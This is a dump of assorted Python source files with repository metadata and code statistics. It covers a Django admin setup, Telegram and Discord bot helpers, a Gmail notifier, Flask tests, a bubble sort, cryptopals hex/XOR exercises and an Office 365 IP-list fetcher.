| 552
|
py
|
Python
|
services/web/freq_demo/admin.py
|
mnesvold/freq
|
27fb15a825e44458c776f4135abf516e751b3fb8
|
[
"MIT"
] | null | null | null |
services/web/freq_demo/admin.py
|
mnesvold/freq
|
27fb15a825e44458c776f4135abf516e751b3fb8
|
[
"MIT"
] | null | null | null |
services/web/freq_demo/admin.py
|
mnesvold/freq
|
27fb15a825e44458c776f4135abf516e751b3fb8
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.contrib.auth.forms import AuthenticationForm
def customize_admin():
admin.site.site_header = 'Feature Request Tracker'
admin.site.site_title = 'Freq'
admin.site.index_title = 'Track Feature Requests with Freq'
admin.site.site_url = None
# allow non-staff users to access admin views
def is_user_active(request):
return request.user.is_active
admin.site.has_permission = is_user_active
# allow non-staff users to log in
admin.site.login_form = AuthenticationForm
| 32.470588
| 63
| 0.75
| 78
| 552
| 5.153846
| 0.512821
| 0.134328
| 0.097015
| 0.089552
| 0.099502
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177536
| 552
| 16
| 64
| 34.5
| 0.885463
| 0.13587
| 0
| 0
| 0
| 0
| 0.124473
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0.181818
| 0.090909
| 0.454545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af2ded2bcaaf00693925512eeea11c00ded8df3d
| 3,842
|
py
|
Python
|
TelegramBot/TelegramBot.py
|
Henrik168/TelegramBot
|
6b11fc47218d616f1a4acfe7ac6494cb802491b9
|
[
"MIT"
] | null | null | null |
TelegramBot/TelegramBot.py
|
Henrik168/TelegramBot
|
6b11fc47218d616f1a4acfe7ac6494cb802491b9
|
[
"MIT"
] | null | null | null |
TelegramBot/TelegramBot.py
|
Henrik168/TelegramBot
|
6b11fc47218d616f1a4acfe7ac6494cb802491b9
|
[
"MIT"
] | null | null | null |
import logging
from dataclasses import dataclass
import TelegramBot.lib_requests as lib_requests
import CustomLogger
@dataclass
class MessageData:
last_message: str
chatroom_id: str
sender_id: str
sender_name: str
@property
def command(self):
if not self.last_message[:1] == "/":
return
if "@" in self.last_message:
return self.last_message.split("@")[0]
elif " " in self.last_message:
return self.last_message.split(" ")[0]
else:
return self.last_message
class TelegramError(Exception):
def __init__(self, text: str, chatroom_id: str = 0):
self.text = text,
self.chatroom_id = chatroom_id
class TelegramBot:
def __init__(self, bot_token: str,
logger: logging.Logger = None):
"""
:param bot_token:
:param logger:
"""
self.bot_token = bot_token
self.url = "https://api.telegram.org/bot" + self.bot_token
self.update_id = 0
self.logger = logger if logger else CustomLogger.getLogger()
def request_bot_info(self) -> dict:
"""Request Bot Info"""
result = lib_requests.http_request(self.url + "/getMe")
if not result["result"]["username"]:
raise TelegramError('Missing data result["result"]["username"]')
self.logger.debug(f"Request Bot Info: {result}")
return result["result"]["username"]
def send_text(self, message: str, chatroom_id: str) -> None:
"""Send Text Message"""
params = {"chat_id": chatroom_id, "text": message}
result = lib_requests.http_request(self.url + "/sendMessage", params)
if not result["ok"]:
raise TelegramError(f"Error sending Text Message: {message} to Chatroom{chatroom_id}")
self.logger.debug(f"Send Text Message: {message} to Chatroom {chatroom_id}")
def send_photo(self, file: bytes, chatroom_id: str) -> None:
if not file:
raise TelegramError(f"Got not bytes Object to send a photo.")
# send file to chat
params = {"chat_id": chatroom_id}
payload = {"photo": file}
result = lib_requests.http_request(self.url + "/sendPhoto", params, payload)
if not result["ok"]:
self.send_text(result["description"], chatroom_id)
raise TelegramError(f"Error sending Photo to Chatroom: {chatroom_id} Response: {result}")
self.logger.debug(f"Send Photo to chat: {chatroom_id}")
def request_message(self) -> MessageData:
"""
Request Last messages.
:return:
"""
params = {"offset": self.update_id + 1}
response = lib_requests.http_request(self.url + "/getUpdates", params)
if not response["ok"]:
raise TelegramError(f"Failure in Response: {response}")
if len(response["result"]) == 0:
return
# store messages to list of MessageData
message = response["result"][0]
self.logger.debug(f"Got message: {message}")
# store last update ID for requesting just newer Messages
self.update_id = message["update_id"]
if "message" not in message.keys():
raise TelegramError(f"Not a Text Message {message}", chatroom_id=message["message"]["chat"]["id"])
if "text" not in message["message"].keys():
raise TelegramError(f"Not a Text Message {message}", chatroom_id=message["message"]["chat"]["id"])
return MessageData(last_message=str(message["message"]["text"]),
chatroom_id=str(message["message"]["chat"]["id"]),
sender_id=str(message["message"]["from"]["id"]),
sender_name=str(message["message"]["from"]["first_name"])
)
| 35.574074
| 110
| 0.60151
| 453
| 3,842
| 4.960265
| 0.203091
| 0.071206
| 0.040053
| 0.039163
| 0.291055
| 0.205607
| 0.192701
| 0.11215
| 0.11215
| 0.11215
| 0
| 0.002857
| 0.271213
| 3,842
| 107
| 111
| 35.906542
| 0.799643
| 0.05518
| 0
| 0.083333
| 0
| 0
| 0.195836
| 0.013787
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097222
| false
| 0
| 0.055556
| 0
| 0.347222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af2fe4de9eede3a49c06c050ed3b255d1c2f19b7
| 2,275
|
py
|
Python
|
Oski/Notifier.py
|
mbanderson/Oski
|
beb68ee5ba4af23d726345d5f726a52d5adfae73
|
[
"MIT"
] | null | null | null |
Oski/Notifier.py
|
mbanderson/Oski
|
beb68ee5ba4af23d726345d5f726a52d5adfae73
|
[
"MIT"
] | null | null | null |
Oski/Notifier.py
|
mbanderson/Oski
|
beb68ee5ba4af23d726345d5f726a52d5adfae73
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""Notifies subscribers of new articles."""
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
class Email:
"""Formats email content as a MIME message."""
def __init__(self, sender, receiver, subject, content, use_html=False):
self.sender = str(sender)
self.receiver = receiver
self.subject = subject
self.content = content
if use_html:
self.email = MIMEMultipart("alternative")
else:
self.email = MIMEMultipart()
self.email["Subject"] = self.subject
self.email["From"] = self.sender
self.email["To"] = self.receiver
if use_html:
body = MIMEText(content, "html")
else:
body = MIMEText(content, "plain")
self.email.attach(body)
def __repr__(self):
"""Converts MIME email to sendable format."""
return self.email.as_string()
def change_receiver(self, receiver):
"""Modify email recipient so we can resend to additional users."""
self.receiver = receiver
self.email["To"] = self.receiver
return
class GmailSender:
"""Sends email through Gmail account."""
def __init__(self, user, pwd):
self.user = user
self.server = smtplib.SMTP("smtp.gmail.com:587")
self.server.starttls()
self.server.login(self.user, pwd)
def send_email(self, email):
self.server.sendmail(str(email.sender),
str(email.receiver),
str(email))
return
def __repr__(self):
return self.user
def __del__(self):
return self.server.quit()
class Notifier:
"""Notifies subscribers of content through GmailSender."""
def __init__(self, subscribers, user, pwd):
self.user = user
self.sender = GmailSender(user, pwd)
self.subscribers = subscribers
def mail_subscribers(self, email):
for subscriber in self.subscribers:
email.change_receiver(subscriber)
self.sender.send_email(email)
return
def __repr__(self):
return repr(self.sender)
def main():
return
if __name__ == "__main__":
main()
| 27.409639
| 75
| 0.607473
| 256
| 2,275
| 5.222656
| 0.3125
| 0.067315
| 0.024682
| 0.035901
| 0.110696
| 0.07629
| 0
| 0
| 0
| 0
| 0
| 0.001845
| 0.285275
| 2,275
| 83
| 76
| 27.409639
| 0.820418
| 0.126593
| 0
| 0.293103
| 0
| 0
| 0.03117
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.189655
| false
| 0
| 0.051724
| 0.068966
| 0.431034
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af33d38936d36aba5ecfba4eb2562457febb889c
| 673
|
py
|
Python
|
repalette/utils/notify.py
|
danielgafni/repalette
|
9317fc4f164ef04500a47e37a5b0bd3917a82516
|
[
"Apache-2.0"
] | 18
|
2021-05-04T15:26:59.000Z
|
2022-01-04T17:17:23.000Z
|
repalette/utils/notify.py
|
danielgafni/repalette
|
9317fc4f164ef04500a47e37a5b0bd3917a82516
|
[
"Apache-2.0"
] | 3
|
2020-11-07T14:45:28.000Z
|
2021-05-05T17:04:22.000Z
|
repalette/utils/notify.py
|
danielgafni/repalette
|
9317fc4f164ef04500a47e37a5b0bd3917a82516
|
[
"Apache-2.0"
] | 2
|
2021-05-04T15:54:31.000Z
|
2021-05-05T00:15:20.000Z
|
import asyncio
import discord
import nest_asyncio
from repalette.constants import DISCORD_BOT_TOKEN
async def __notify_discord(channel_id, message):
client = discord.Client()
async def __send_message():
await client.wait_until_ready()
await client.get_channel(channel_id).send(message)
await client.close()
client.loop.create_task(__send_message())
await client.start(DISCORD_BOT_TOKEN)
def notify_discord(channel_id, message):
nest_asyncio.apply()
loop = asyncio.get_event_loop()
loop.run_until_complete(
__notify_discord(
channel_id=channel_id,
message=message,
)
)
| 21.709677
| 58
| 0.702823
| 82
| 673
| 5.378049
| 0.378049
| 0.102041
| 0.136054
| 0.14966
| 0.145125
| 0.145125
| 0
| 0
| 0
| 0
| 0
| 0
| 0.218425
| 673
| 30
| 59
| 22.433333
| 0.838403
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.190476
| 0
| 0.238095
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af34c785490cf98dfc2a7f4269f8b57f92aab889
| 4,404
|
py
|
Python
|
tests/test_main.py
|
sforzando/q-lako
|
dcf31fdc50147415a1da7c5b411568478984e31a
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
sforzando/q-lako
|
dcf31fdc50147415a1da7c5b411568478984e31a
|
[
"MIT"
] | 79
|
2020-10-06T08:34:44.000Z
|
2020-12-12T17:28:53.000Z
|
tests/test_main.py
|
sforzando/q-lako
|
dcf31fdc50147415a1da7c5b411568478984e31a
|
[
"MIT"
] | null | null | null |
import logging
import pytest
from werkzeug.datastructures import ImmutableMultiDict
from main import app
@pytest.fixture
def test_client():
app.config["TESTING"] = True
return app.test_client()
def test_GET_index(test_client):
response = test_client.get("/")
assert response.status_code == 200
assert b"Registration of equipment and books." in response.data
assert b"Enter one of the following keywords" in response.data
def test_GET_search_with_correct_query(test_client):
response = test_client.get("/search?query=kindle")
assert b"Search results for kindle" in response.data
def test_GET_search_with_incorrect_query(test_client):
response = test_client.get("/search?unexpected_query=kindle", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Enter any keywords." in response.data
def test_GET_search_with_not_inputted_query(test_client):
response = test_client.get("/search?query=", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Enter any keywords." in response.data
def test_GET_search_direct_access(test_client):
response = test_client.get("/search", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Enter any keywords." in response.data
def test_GET_registration_direct_access(test_client):
response = test_client.get("/registration", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Enter any keywords." in response.data
def test_POST_registration_success(test_client):
test_client.get("/search?query=UNIX")
response = test_client.post("/registration", data={"asin": "4274064069"})
assert "Registration for details of UNIXという考え方―その設計思想と哲学" in response.data.decode("UTF-8")
def test_POST_registration_failure(test_client):
response = test_client.post("/registration", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Please try the procedure again from the beginning, sorry for the inconvenience." in response.data
def test_POST_registration_contributors(test_client):
test_client.get("/search?query=DeepLearning")
response = test_client.post("/registration", data={"asin": "4873117585"})
assert "ゼロから作るDeep Learning ―Pythonで学ぶディープラーニングの理論と実装" in response.data.decode("UTF-8")
assert "斎藤 康毅" in response.data.decode("UTF-8")
def test_POST_registration_publication_date_parse_failed(test_client, caplog):
test_client.get("/search?query=UNIX")
with test_client.session_transaction() as _session:
for product in _session["product_list"]:
product.info.publication_date = "unsupported format"
test_client.post("/registration", data={"asin": "4274064069"})
assert ("__init__", logging.ERROR,
"registration: Parse failed. Unknown string format: unsupported format") in caplog.record_tuples
def test_POST_register_airtable_success(test_client):
imd = ImmutableMultiDict(
[
("image_url", "https://m.media-amazon.com/images/I/210tcugW9ML.jpg"),
("title", "テンマクデザイン サーカス TC DX"),
("url", "https://www.amazon.co.jp/dp/B07XB5WX89?tag=bellonieslog-22&linkCode=osi&th=1&psc=1"),
("asin", "B07XB5WX89"),
("manufacturer", "テンマクデザイン"),
("contributors", None),
("publication_date", None),
("product_group", "Sports"),
("registrants_name", "yusuke-sforzando"),
("default_positions", "sforzando-kawasaki"),
("current_positions", "sforzando-kawasaki"),
("note", ""),
("features", "['サーカスTC DX\\u3000サンドカラー', '【サーカスTCと共通 ●設営が簡単に出来るセットアップガイド付。']")
]
)
test_client.get("/search?query=サーカスTC")
test_client.post("/registration", data={"asin": "B07XB5WX89"})
response = test_client.post("/register_airtable", data=imd, follow_redirects=True)
assert b"Registration completed!" in response.data
def test_POST_register_airtable_failure(test_client):
test_client.get("/search?query=サーカスTC")
test_client.post("/registration", data={"asin": "B07XB5WX89"})
response = test_client.post("/register_airtable", data={}, follow_redirects=True)
assert b"Registration failed." in response.data
| 40.036364
| 110
| 0.719573
| 551
| 4,404
| 5.557169
| 0.275862
| 0.111039
| 0.082299
| 0.055846
| 0.596016
| 0.571522
| 0.510124
| 0.449053
| 0.363488
| 0.317766
| 0
| 0.018423
| 0.161898
| 4,404
| 109
| 111
| 40.40367
| 0.81035
| 0
| 0
| 0.2
| 0
| 0.0125
| 0.340372
| 0.023842
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.1625
| false
| 0
| 0.05
| 0
| 0.225
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af35346b37ed36d8f98147a976a6e4de22d8db47
| 849
|
py
|
Python
|
data/external/repositories_2to3/126714/kaggle-avazu-master/script/append.py
|
Keesiu/meta-kaggle
|
87de739aba2399fd31072ee81b391f9b7a63f540
|
[
"MIT"
] | null | null | null |
data/external/repositories_2to3/126714/kaggle-avazu-master/script/append.py
|
Keesiu/meta-kaggle
|
87de739aba2399fd31072ee81b391f9b7a63f540
|
[
"MIT"
] | null | null | null |
data/external/repositories_2to3/126714/kaggle-avazu-master/script/append.py
|
Keesiu/meta-kaggle
|
87de739aba2399fd31072ee81b391f9b7a63f540
|
[
"MIT"
] | 1
|
2019-12-04T08:23:33.000Z
|
2019-12-04T08:23:33.000Z
|
f1 = open("../train_pre_1")
f2 = open("../test_pre_1")
out1 = open("../train_pre_1b","w")
out2 = open("../test_pre_1b","w")
t = open("../train_gbdt_out")
v = open("../test_gbdt_out")
add = []
for i in range(30,49):
add.append("C" + str(i))
line = f1.readline()
print(line[:-1] + "," + ",".join(add), file=out1)
line = f2.readline()
print(line[:-1] + "," + ",".join(add), file=out2)
for i in range(40428967):
line = f1.readline()[:-1]
a = t.readline()[:-1]
ll = a.split(" ")[1:]
for j in range(19):
line += "," + add[j] + "_" + ll[j]
print(line, file=out1)
for i in range(4577464):
line = f2.readline()[:-1]
a = v.readline()[:-1]
ll = a.split(" ")[1:]
for j in range(19):
line += "," + add[j] + "_" + ll[j]
print(line, file=out2)
f1.close()
f2.close()
out1.close()
out2.close()
t.close()
v.close()
| 23.583333
| 50
| 0.537102
| 138
| 849
| 3.202899
| 0.275362
| 0.079186
| 0.040724
| 0.074661
| 0.380091
| 0.380091
| 0.380091
| 0.248869
| 0.248869
| 0.248869
| 0
| 0.074236
| 0.190813
| 849
| 35
| 51
| 24.257143
| 0.569141
| 0
| 0
| 0.181818
| 0
| 0
| 0.125307
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.121212
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af39c62b461abaa60323cf851d4989edf2ec5def
| 851
|
py
|
Python
|
run_learning.py
|
ZhaomingXie/RLAlg
|
dff9fc9be9417797ded428fc706cd779e638f7bf
|
[
"MIT"
] | null | null | null |
run_learning.py
|
ZhaomingXie/RLAlg
|
dff9fc9be9417797ded428fc706cd779e638f7bf
|
[
"MIT"
] | null | null | null |
run_learning.py
|
ZhaomingXie/RLAlg
|
dff9fc9be9417797ded428fc706cd779e638f7bf
|
[
"MIT"
] | 1
|
2020-05-29T01:37:42.000Z
|
2020-05-29T01:37:42.000Z
|
from PPO import *
from TD3 import *
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--policy_path", required=True, type=str)
parser.add_argument("--stats_path", required=True, type=str)
parser.add_argument("--env", required=True, type=str)
parser.add_argument("--seed", required=True, type=int)
parser.add_argument("--learn_contact", action='store_true')
args = parser.parse_args()
random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
np.random.seed(args.seed)
torch.set_num_threads(args.seed)
import gym
env = gym.make(args.env)
env.seed(args.seed)
ppo = RL(env, [256, 256], learn_contact=args.learn_contact)
print(args.learn_contact)
ppo.seed = args.seed
ppo.model_name = args.policy_path
ppo.stats_name = args.stats_path
ppo.save_model(ppo.model_name)
ppo.collect_samples_multithread()
| 31.518519
| 61
| 0.782609
| 135
| 851
| 4.740741
| 0.333333
| 0.0875
| 0.132813
| 0.089063
| 0.253125
| 0.18125
| 0.18125
| 0.125
| 0
| 0
| 0
| 0.00885
| 0.070505
| 851
| 27
| 62
| 31.518519
| 0.800253
| 0
| 0
| 0
| 0
| 0
| 0.071596
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.16
| 0
| 0.16
| 0.04
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af39df71abbbbebb35d3f9fbf9be1554dbe20b3c
| 797
|
py
|
Python
|
Sorting/bubble_sort.py
|
fredricksimi/leetcode
|
f6352c26914ca77f915f5994746ecf0b36efc89b
|
[
"MIT"
] | null | null | null |
Sorting/bubble_sort.py
|
fredricksimi/leetcode
|
f6352c26914ca77f915f5994746ecf0b36efc89b
|
[
"MIT"
] | null | null | null |
Sorting/bubble_sort.py
|
fredricksimi/leetcode
|
f6352c26914ca77f915f5994746ecf0b36efc89b
|
[
"MIT"
] | 1
|
2021-12-05T12:27:46.000Z
|
2021-12-05T12:27:46.000Z
|
"""
Bubble Sort:
"""
# Best: O(n) time | O(1) space
# Average: O(n^2) time | O(1) space
# Worst: O(n^2) time | O(1) space
def bubbleSort(array):
did_swap = False
while True:
did_swap = False
for idx in range(1, len(array)):
if array[idx] < array[idx-1]:
# swap
array[idx], array[idx-1] = array[idx-1], array[idx]
did_swap = True
if not did_swap:
return array
"""
Traverse the input array, swapping any two numbers that are out of order and keeping track of any swaps that you make.
Once you arrive at the end of the array, check if you have made any swaps;
if not, the array is sorted and you are done; otherwise, repeat the steps laid out in this hint until the array is sorted.
"""
| 26.566667
| 122
| 0.604768
| 131
| 797
| 3.648855
| 0.473282
| 0.100418
| 0.037657
| 0.069038
| 0.165272
| 0.058577
| 0.058577
| 0
| 0
| 0
| 0
| 0.016043
| 0.29611
| 797
| 29
| 123
| 27.482759
| 0.836007
| 0.141782
| 0
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af3d1abf4c4665c9462b07e2b917b4a51a0fdfc4
| 1,715
|
py
|
Python
|
ccs1.py
|
derrickaw/operation_crypto
|
6bf006a0a9246f6a9c5ae64b1bb395cc9d951c72
|
[
"MIT"
] | null | null | null |
ccs1.py
|
derrickaw/operation_crypto
|
6bf006a0a9246f6a9c5ae64b1bb395cc9d951c72
|
[
"MIT"
] | null | null | null |
ccs1.py
|
derrickaw/operation_crypto
|
6bf006a0a9246f6a9c5ae64b1bb395cc9d951c72
|
[
"MIT"
] | null | null | null |
# Crypto Challenge Set 1
"""
1. Convert hex to base64
2. Fixed buffer XOR
3.
"""
import base64
def convert_hex_to_base64(hex):
"""
Converts hex string to base64 encoding
:param hex: hex encoded string
:return: base64 encoded string
"""
# Convert hex to byte string
decoded_hex = bytearray.fromhex(hex)
# Convert byte string to base64 encoded string; then convert to string
encoded_base64_str = bytes.decode(base64.b64encode(decoded_hex))
return encoded_base64_str
def xor_fixed_buffers(buf1, buf2):
"""
Creates XOR buffered string from two hex string buffers
:param buf1: hex encoded string
:param buf2: hex encoded string
:return: xor hex encoded string
"""
# Convert hex to bytearray
decoded_hex_buf1 = bytearray.fromhex(buf1)
decoded_hex_buf2 = bytearray.fromhex(buf2)
# XOR by byte
xor_buf = bytearray(len(decoded_hex_buf1))
for i in range(len(xor_buf)):
xor_buf[i] = decoded_hex_buf1[i] ^ decoded_hex_buf2[i]
# Convert back to hex string
xor_buf = bytes(xor_buf).hex()
return xor_buf
if __name__ == '__main__':
# 1. Convert hex to base64
assert convert_hex_to_base64('49276d206b696c6c696e6720796f757'
'220627261696e206c696b6520612070'
'6f69736f6e6f7573206d757368726f6'
'f6d') \
== 'SSdtIGtpbGxpbmcgeW91ciBicmFpbiBsaWtlIGEgcG9pc29ub3VzIG11c2hyb29t'
# 2. Fixed XOR
assert xor_fixed_buffers('1c0111001f010100061a024b53535009181c',
'686974207468652062756c6c277320657965') \
== '746865206b696420646f6e277420706c6179'
| 23.175676
| 77
| 0.661224
| 187
| 1,715
| 5.850267
| 0.304813
| 0.063985
| 0.065814
| 0.065814
| 0.080439
| 0
| 0
| 0
| 0
| 0
| 0
| 0.18124
| 0.266472
| 1,715
| 73
| 78
| 23.493151
| 0.688394
| 0.304373
| 0
| 0
| 0
| 0
| 0.244898
| 0.235138
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.090909
| false
| 0
| 0.045455
| 0
| 0.227273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af3fd4c2face07438cfa2add7939e20eaaa6ebd0
| 7,748
|
py
|
Python
|
o365_ip.py
|
satchm0h/o365_ip
|
1845fc6e5a2414f23bbce82784f4e7f0cac6528b
|
[
"MIT"
] | 1
|
2020-11-01T11:03:01.000Z
|
2020-11-01T11:03:01.000Z
|
o365_ip.py
|
satchm0h/o365_ip
|
1845fc6e5a2414f23bbce82784f4e7f0cac6528b
|
[
"MIT"
] | null | null | null |
o365_ip.py
|
satchm0h/o365_ip
|
1845fc6e5a2414f23bbce82784f4e7f0cac6528b
|
[
"MIT"
] | null | null | null |
#!/bin/env python3
import os
import sys
import json
import uuid
import argparse
import logging
import coloredlogs
import requests
# Defining the default values that can be overridden on the CLI
DEFAULTS = {
'guidfile': 'client-guid',
'outfile': 'last-dump',
'verfile': 'last-version',
'instance': 'Worldwide'
}
def main(options):
# Lets make do stuff. See init at the bottom for the 'options' logic
logging.info('Starting')
if options.force:
if options.deltafile:
if os.path.isfile(options.deltafile):
os.remove(options.deltafile)
if os.path.isfile(options.verfile):
os.remove(options.verfile)
if os.path.isfile(options.outfile):
os.remove(options.outfile)
# If we are doing a delta, wipe any previous delta file
if options.deltafile is not None:
write_json_file(options.deltafile, {})
# If there is no update we are done, unless forced
(new_version, previous_version) = get_versions(options.version_url,
options.verfile)
if new_version == previous_version:
logging.info('Version matches previous. No update')
sys.exit(0)
# Download and process the latest IPs
ip_struct = get_ip_addresses(options.data_url, options.optional)
# Calcualte delta if we are asked to do so
if options.deltafile is not None:
generate_delta(ip_struct, options.outfile, options.deltafile)
logging.info(f'Delta File: {options.deltafile}')
# Dump the latest results to disk
write_json_file(options.outfile, ip_struct, True)
commit_processed_version(options.verfile, new_version)
logging.info(f'Output File: {options.outfile}')
logging.info('Complete!')
def write_json_file(filename, data, pretty=False):
# Dump a python data structure to JSON FILE
logging.debug(f'Writing JSON File : {filename}')
with open(filename, 'w') as file_handle:
if pretty:
json.dump(data, file_handle, indent=2)
else:
json.dump(data, file_handle)
def get_versions(url, filename):
# Here we want to determinge if there is a new version to process or not
previous_version = "42"
logging.debug('Downloading Version Information')
current_version = get_version_info(url)
# If we've run before, read in the version last processed
if os.path.isfile(filename):
previous_version = read_single_state(filename)
if current_version == previous_version:
logging.debug(f'No version change: {current_version}')
else:
logging.debug(f'New version discovered: {current_version}')
return (current_version, previous_version)
def commit_processed_version(filename, version):
# Write out the version we have finished processing
logging.debug(f'Writing last processed version to: {filename}')
write_single_state(filename, version)
def get_version_info(url):
version_info = requests.get(url).json()
if 'latest' in version_info:
return version_info['latest']
return None
def read_single_state(filename):
logging.debug(f'Read state file: {filename}')
with open(filename, 'r') as file_handle:
return file_handle.readline().rstrip()
def write_single_state(filename, value):
logging.debug(f'Write state file: {filename}')
with open(filename, 'w') as file_handle:
print(value, file=file_handle)
def generate_delta(data, filename, deltafile):
logging.debug('Generating Delta')
delta = {'add': [], 'remove': []}
previous = {}
# If there is a previous run, lets load it.
if os.path.isfile(filename):
with open(filename, 'r') as file_handle:
previous = json.load(file_handle)
# Find new additions
for ip in data:
if ip not in previous:
delta['add'].append(ip)
# Find removals
for ip in previous:
if ip not in data:
delta['remove'].append(ip)
# Write out the Delta
write_json_file(deltafile, delta, True)
def init_deltafile(filename):
logging.debug(f'Initializing Delta File : {filename}')
if os.path.isfile(filename):
with open(filename, 'w') as file_handle:
# Empty object in-case there are no changes
print('{}', file=file_handle)
def get_ip_addresses(url, include_optional):
logging.debug(f'Include optional IPs: {include_optional}')
# We are going to accumualte IPs in dicts to de-dup
ips = {}
records = requests.get(url).json()
for record in records:
if 'ips' in record:
for ip in record['ips']:
if record['required']:
ips[ip] = 42
elif include_optional:
ips[ip] = 42
return ips
def init():
'''
init()
Handle command line args, setup log, etc..
'''
global DEFAULTS
# Configure log
coloredlogs.install(level='DEBUG',
fmt='%(asctime)s %(levelname)s %(message)s')
# Supress requests log
logging.getLogger('requests').setLevel(logging.WARNING)
logging.getLogger('urllib3').setLevel(logging.WARNING)
# Handle command line args
parser = argparse.ArgumentParser(
description='Get Microsoft Office 365 IP lists.')
parser.add_argument('-D, --debug', dest='debug',
help='Full download output',
action='store_true')
parser.add_argument('-f, --force', dest='force',
help='Download update even if version has not changed',
action='store_true')
parser.add_argument('-o, --outfile', dest='outfile',
help='Full download output',
default=DEFAULTS['outfile'])
parser.add_argument('-v, --verfile', dest='verfile',
help='File to store version infomation',
default=DEFAULTS['verfile'])
parser.add_argument('-d, --deltafile', dest='deltafile',
help='Generate delta to file',
default=None)
parser.add_argument('-g, --guidfile', dest='guidfile',
help='File to load guid from. Will generate if file not found',
default=DEFAULTS['guidfile'])
parser.add_argument('-i, --instance', dest='instance',
help='Microsoft Office 365 Instance',
choices=['Worldwide', 'China', 'Germany',
'USGovDoD', 'USGovGCCHigh'],
default=DEFAULTS['instance'])
parser.add_argument('-p, --disable_optional_ips', dest='optional',
help="Do not include optional IPs",
action='store_false')
options = parser.parse_args()
# Enable debug
if not options.debug:
coloredlogs.decrease_verbosity()
# Read client guid from file or generate and write to file for
# subsequent runs. Not Microsoft asks for a unique UUID per "system" that
# accesses the API
if os.path.isfile(options.guidfile):
options.client_guid = read_single_state(options.guidfile)
else:
options.client_guid = uuid.uuid4()
write_single_state(options.guidfile, options.client_guid)
# Build the URLs based on the Instance selection and our guid
base_url = 'https://endpoints.office.com'
options.version_url = f'{base_url}/version/{options.instance}/?clientrequestid={options.client_guid}'
options.data_url = f'{base_url}/endpoints/{options.instance}/?clientrequestid={options.client_guid}'
return options
if __name__ == '__main__':
main(init())
| 33.834061
| 105
| 0.63126
| 944
| 7,748
| 5.068856
| 0.258475
| 0.022989
| 0.021735
| 0.020481
| 0.143365
| 0.108882
| 0.061651
